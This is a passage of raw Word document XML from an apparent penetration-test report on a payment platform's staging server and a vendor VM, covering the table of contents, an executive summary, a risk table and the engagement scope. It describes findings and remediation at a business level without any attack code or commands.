            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F1DA691" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906615" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3  Phased rollout — 30 / 60 / 90 day plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906615 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F8BC286" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906616" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Window 1 — Days 0 to 30 (Quick Wins)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906616 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FB24AD9" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906617" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Window 2 — Days 31 to 60 (Strategic Initiatives)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906617 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05EE3B35" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906618" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Window 3 — Days 61 to 90 (Heavy / Vendor-dependent)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906618 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F620199" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906619" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4  Risk Register Entry</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906619 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DE41DE8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="035C0029" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B1011" w14:textId="6B9AC9E3" w:rsidR="000E57A4" w:rsidRDefault="00000000" w:rsidP="00C23662">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:sectPr w:rsidR="000E57A4">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1200" w:right="1440" w:bottom="1200" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>To refresh: right-click any line above and choose "Update Field" → "Update entire table".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65144DD7" w14:textId="41AED7D4" w:rsidR="000E57A4" w:rsidRDefault="000E57A4"/>
    <w:p w14:paraId="56FB2000" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc229906566"/>
      <w:r>
        <w:t>2. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7B07733E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD0A28" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Between 12 and 26 April 2026, Triton Security Labs carried out an external black-box penetration test against one production-class server (cassandra-stg-01) of the Cassandra Pay payment-processing platform, with an optional second phase reviewing a virtual-machine image (vendor-eval-01) submitted by a candidate infrastructure vendor. The test was conducted under a restricted Rules of Engagement that excluded kernel-level exploits, denial-of-service techniques, and pivoting to neighbouring systems. The objective was to determine how far an attacker can move from an initial low-privilege foothold to full administrative control of the asset, and to translate the findings into specific actions for the operations and engineering teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DB8B4E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The security posture of the assessed asset is rated BELOW the industry baseline for production exposure. The combination of one over-permissive administrative rule and one binary placed in a non-standard location allows a routine staff account to obtain full administrative control of the server in under ten seconds. The same engagement's second phase showed that a candidate vendor's pre-installed virtual machine carries a publicly exploitable application that grants application-level control to anyone reaching the web service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C02F4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A3FC2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc229906567"/>
      <w:r>
        <w:t>Top-3 business risks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200"/>
        <w:gridCol w:w="4826"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="24A81EA3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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44BCA55B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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14207086" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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3B897DB3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>What this means for the business</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="309CE91D"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0AC0830" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Over-permissive administrative rule on production server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2C30363" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Critical</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E65C0A9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Any staff user with shell access can take full control of the payment server in under ten seconds, leading to potential interruption of payment processing and exposure of customer data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6CD6DB63"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EA7CF96" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Hardcoded database access credentials in vendor-supplied web app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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6D35CFF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High</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5A382A0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>A pre-installed third-party web application provided by a candidate vendor stores database administrator credentials in plain text within a web-readable file, defeating the access controls Cassandra Pay would expect to inherit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="5913A22B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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9AB45B3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Outdated password storage in vendor application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A9DAAB0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Medium</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DA9E06D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>The same vendor application stores user passwords using a hashing technique whose security has been considered unsuitable for over a decade; passwords can be recovered in fractions of a second once the database is reached.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61412D07" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69447B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The single most important action is to remove the over-permissive administrative rule (technically: the unrestricted permission to run a general-purpose text-processing tool with administrative rights) and replace it with a narrow, purpose-built wrapper that allows only the specific operational task that originally motivated the rule. This change takes less than thirty minutes for a system administrator to implement, requires no purchases, does not affect any user-visible workflow, and removes the fastest path an attacker could use to escalate from a foothold to full server control. All other recommendations are valuable, but this one removes the immediate worst case and should precede them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74DB7C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714CB62" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc229906568"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Engagement Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="53CB564D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc229906569"/>
      <w:r>
        <w:t>3.1  Scope and Boundaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3ABAB0CC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The engagement covers two distinct assets, which together represent two phases of the same contract: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400"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1726"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="04CED466" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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271D605F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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2D06E352" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>IP / Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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7C4B8D36" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Service tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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79755B4E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Primary services in scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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263CC7EF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6CF7E144"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DB705DB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cassandra-stg-01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16849E5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>10.42.7.15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8E7BDE4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Staging (production-equivalent build)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D6CBCA7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>SSH (TCP/22) only — exposed staff administrative interface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F8E30ED" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Phase 1 – Post-exploitation assessment from an assumed foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="733F1CBC"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C89E07D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01</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076261A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>10.42.8.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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FA095AD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Isolated evaluation network</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2E9AECB5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>HTTP (TCP/80), SSH (TCP/22)</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877B3F3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Phase 2 – Pre-acceptance review of a candidate vendor VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="573E3F9F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1BA330" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
